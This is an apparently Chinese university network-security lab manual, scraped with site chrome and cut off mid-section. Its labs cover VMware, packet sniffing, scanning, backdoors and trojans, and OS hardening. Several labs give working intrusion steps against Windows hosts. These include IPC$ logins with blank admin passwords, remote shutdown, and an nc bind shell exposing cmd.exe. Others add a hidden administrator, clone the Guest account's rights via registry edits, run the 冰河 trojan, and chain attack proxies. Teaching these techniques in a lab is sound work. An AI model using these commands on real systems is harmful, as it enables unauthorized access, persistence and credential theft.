网络安全实验指导

上传人:206****923 文档编号:88910230 上传时间:2019-05-13 格式:DOC 页数:11 大小:82KB
返回 下载 相关 举报
网络安全实验指导_第1页
第1页 / 共11页
网络安全实验指导_第2页
第2页 / 共11页
网络安全实验指导_第3页
第3页 / 共11页
网络安全实验指导_第4页
第4页 / 共11页
网络安全实验指导_第5页
第5页 / 共11页
点击查看更多>>
资源描述

《网络安全实验指导》由会员分享,可在线阅读,更多相关《网络安全实验指导(11页珍藏版)》请在金锄头文库上搜索。

1、目 录项目一 Vmware虚拟机及sniffer抓包软件的使用项目二 网络基本命令的使用项目三 扫描和网络监听项目四 后门与木马项目五 操作系统安全配置方案项目六 防火墙技术项目一 Vmware虚拟机及sniffer抓包软件的使用一 实验目的1、 学会安装和使用vmware软件并能够熟练配置虚拟机。2、 学会使用sniffer软件抓取数据包。二 实验设备1、 配置有vmware软件和sniffer软件的电脑多台。2、 局域网环境。三 实验学时 4学时四 实验内容1、 安装vmware虚拟机。2、 配置vmware虚拟机。1)在虚拟机中装操作系统,选择菜单栏“File”下的“New”菜单项,再选

2、择子菜单“New Virtual Machine”。2)有两种选择,选项“Typical”是典型安装,选项“Custom”是自定义安装,我们选择“Custom”安装方式。点击按钮“下一步”。3)进入选择操作系统界面,设置将来要安装的操作系统windows 2000 advanced sever. 点击按钮“下一步”.4)选择虚拟机的内存大小,我们设置128M.点击下一步。5)选择虚拟机的连网方式,我们设置为“Used Bridged networking”,点击“下一步”。6)创建磁盘,我们选择Create a new virtual disk,点击下一步。7)选择虚拟磁盘所要安装的目录,最后

3、完成。3、 测试vmware虚拟机和局域网中其他电脑的连通性。1)设置虚拟机的ip(与主机ip在同一网段)。2)用ping命令测试虚拟机在局域网的连通性。4、 使用sniffer抓包1)进入Sniffer主界面,抓包之前必须首先设置要抓取数据包的类型。选择主菜单Capture下的Define Filter菜单2)在Address下拉列表中,选择抓包的类型是IP。3)点击该窗口的Advanced选项卡,拖动滚动条找到IP项,将IP和ICMP选中。4)主机的DOS窗口中Ping虚拟机,点击开始键,出现的窗口选择Decode选项卡,可以看到数据包在两台计算机间的传递过程。五 实验小结通过本次实验学生

4、能够掌握vmware软件和sniffer软件的使用方法,为以后进一步学习打好基础。六 注意事项实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。项目二 网络基本命令的使用一 实验目的1、 理解并熟练掌握网络攻击和防御中常见的DOS命令。2、 掌握IPC$技术的攻击及防御的常用方法。二 实验设备1、 连接到局域网的计算机多台。2、 应用软件:shutdown.exe(远程关机程序);nc.exe(“瑞士军刀”程序)。三 实验学时 4学时四 实验内容1、利用DOS命令实现远程关机:1)拷贝工具shutdown.exe到本机目录c:winntsystem32下。2)输入命令:ping 目标

5、机ip,测试与目标机的是否连通。3)用net命令进行远程连接:net use 目标机ipipc$ “password” /user:”username”(局域网内计算机用户id为:administrator,用户password为空).4)输入远程重启计算机指令:shutdown -r -m 目标机ip(命令:shutdown /?查询shutdown的使用方法)2、利用nc.exe在远程电脑开启telnet服务:1)利用net命令同远程电脑建立连接,方法同上。2)使用copy命令将nc.exe拷贝到远程电脑的C:winntsystem32目录下:l net use 目标机ipipc$ “pa

6、ssword” /user:”username”l copy 本机路径nc.exe 目标机ipadmin$system323)利用at命令远程执行程序nc.exe开启telnet服务。at 目标机IP time nc -l -p 99(指定端口) -t -e cmd.exe(命令:nc h查询nc程序的使用方法)4)利用目标机99端口telnet登陆远程电脑:telnet 目标机ip 993、在远程电脑上新建文件。4、在远程计算机上创建自己的管理员用户:1)net user username /add2)net localgroup administrators username /add5、

7、 查看当前系统中的用户确认添加用户操作是否成功:net user 6、删除本机ipc$共享:net share ipc$ /deletenet share admin$ /deletenet share c$ /delete7、查看端口操作:使用命令netstat an查看本机端口。五 实验小结通过本次实验同学们熟练掌握一些常用的网络命令,进一步理解了ipc$技术的漏洞和防御方法。六 注意事项 实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。项目三 扫描和网络监听一、实验目的 掌握网络监听的工作机制和作用,学习常用的扫描和监听工具,如PortScan、WinSniffer和X-sc

8、an等程序的使用。二、实验设备1、连接到局域网的计算机多台2、扫描和监听程序,如PortScan、WinSniffer和X-scan等。三、实验学时 4学时四、实验内容实验需要两台计算机,可在主机的vmware中安装Windows2000Server来代替另一台计算机,并开放远程终端服务端口,在主机中安装扫描和监听程序,如PortScan、WinSniffer和X-scan等。1、在主机的vmware中安装Windows2000Server,并开放远程终端服务端口,在主机中安装扫描和监听程序,如PortScan、WinSniffer和X-scan等。2、使用扫描和网络监听程序对安装Window

9、s2000Server的服务器进行监听并实现入侵。 1)使用PortScan对Windows2000Server的服务器进行端口扫描,在“Scan”文本框中输入IP地址,单击按钮“START”,开始扫描。2)使用X-scan对Windows2000Server的服务器进行网络安全漏洞扫描。在“指定IP范围”中输入对方IP,并在“扫描模块”设置想要扫描的参数,设置完成后,点击“开始扫描”。3)使用网络监听WinSniffer截取局域网内的密码。安装并打开WinSniffer,单击工具栏图标“Adapter”,设置网卡为本机物理网卡“Realtek RTL8139(A)”,单击“start”开始监

10、听。使用DOS命令行连接远程的FTP服务,抓取密码。五、实验总结本次实验使学生掌握常用的扫描和监听工具,如PortScan、WinSniffer和X-scan等程序的使用方法。六 注意事项 实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。项目四 后门与木马一 实验目的 区分木马与后门,掌握常用的后门设置方法,掌握木马冰河的使用、掌握如何设置网络代理跳板。二 实验设备1、连接到局域网的计算机多台2、使用工具:RTCS.vbe、psu.exe、pulist.exe、djxyxs.exe、冰河V8.2、sksockserver.exe、SkServerGUI.exe、sc32r231.e

11、xe三 实验学时 4学时四 实验内容 1、利用工具RTCS.vbe可以远程开启对方的Telnet服务,使用该工具需要知道对方具有管理员权限的用户名和密码。命令的语法是:“cscript RTCS.vbe 172.18.25.109 administrator 123456 1 23”。 2、利用工具软件psu.exe得到注册表键值的查看和编辑权。将psu.exe拷贝对方主机的C盘下,并在任务管理器查看对方主机winlogon.exe进程的ID号或者使用pulist.exe文件查看该进程的ID号,执行命令:“psu -p regedit -i pid”其中pid为Winlogon.exe的进程号

12、。在打开的注册表编辑器中将Guest(0x1f5)中的键值用Administrator(0x1f4)中的键值覆盖。在注册表中将Guest和0x1f5导出,删除,再重新导入。然后执行:“net user guest (新密码) 修改guest帐户密码 net user guest /active:yes 开启guest帐户 net user guest /active:no 停止guest帐户” OK! 3、将djxyxs.exe文件上传并拷贝到对方服务器的Winnttemp目录下,执行,解压后执行解压出来的azzd.exe文件。该文件使服务器自动重启,使用终端服务连接软件(如mstsc.exe

13、)登陆服务器。 4、使用“冰河”进行远程控制 win32.exe文件是服务器端程序,Y_Client.exe文件为客户端程序。将win32.exe文件在远程得计算机上执行以后,通过Y_Client.exe文件来控制远程得服务器。 5、首先将本地计算机设置为一级代理,将文件拷贝到C盘根目录下,然后将代理服务工具sksockserver.exe安装到主机上。执行步骤为:执行“sksockserver -install”将代理服务安装主机中,执行“sksockserver -config port 1122”将代理服务的端口设置为1122,当然可以设置为其他的数值,执行“sksockserver -

14、config starttype 2”将该服务的启动方式设置为自动启动,执行“net start skserver”启动代理服务。 在网络上其他的主机上设置二级代理,使用本地代理配置工具:SkServerGUI.exe,在主菜单“配置”下的菜单项“经过的SKServer”设置参数。 安装sc32r231.exe,安装汉化HBC-SC32231-Ronnier.exe,然后执行该程序。五 实验总结通过本次实验使学生能够区分木马与后门,掌握远程开启对方的Telnet服、让禁用的Guest具有管理权限的方法、连接到终端服务的方法,并考虑其防御方法,掌握如何设置网络代理跳板。六 注意事项 实验软件有一

15、定的破坏性,有可能影响实验用计算机的正常运行。项目五 操作系统安全配置方案一 实验目的1、掌握操作系统安全配置。2、掌握操作系统的安全策略配置。3、 掌握操作系统安全信息通信配置。二 实验设备1、Windows2000操作系统。2、局域网环境。三 实验学时4学时四 实验内容1、操作系统安全配置:停止Guest帐号、限制用户数量、创建多个管理员帐号、管理员帐号改名、设置陷阱帐号、更改默认权限、管理员帐号设置安全密码、设置屏幕保护密码。2、操作系统的安全策略配置:关闭不必要的服务、关闭不必要的端口、开启审核策略、开启密码策略、开启帐户策略、备份敏感文件、不显示上次登陆名、禁止建立空连接、下载最新的补丁。3、操作系统安全

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 中学教育 > 其它中学文档

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号